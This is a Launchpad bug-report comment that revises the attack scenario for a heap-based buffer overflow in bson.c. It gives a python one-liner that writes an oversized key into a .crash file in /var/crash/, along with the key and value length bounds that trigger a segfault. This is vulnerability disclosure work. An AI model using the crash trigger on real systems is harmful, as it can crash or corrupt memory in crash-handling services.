Comment 3 for bug 1872560
Revision history for this message
| Seong-Joong Kim (sungjungk) wrote Re: heap-based buffer overflow in bson.c | #3 |
© 2004
Canonical Ltd.
•
Terms of use
•
Data privacy
•
Contact Launchpad Support
•
Blog
•
Careers
•
System status
•
35a32c5
(Get the code!)
I would like to update the contents of 'Attack Scenario'.
from:
$ python -c "print('A' * 0xFFFFFFFF + ' : ' + 'B')" > /var/crash/
to:
$ python -c "print('A' * 0xFFFFFFFE + ' : ' + 'B')" > /var/crash/
Segfault can arise when the following requirements are met, as I mentioned above.
- length of ‘value’ in .crash file => 0 < {length of ‘value’} < 1024
- length of ‘key’ in .crash file => UINT32_MAX - {length of ‘value’} - 7 < {length of ‘key’} < UINT32_MAX
Please check this issue.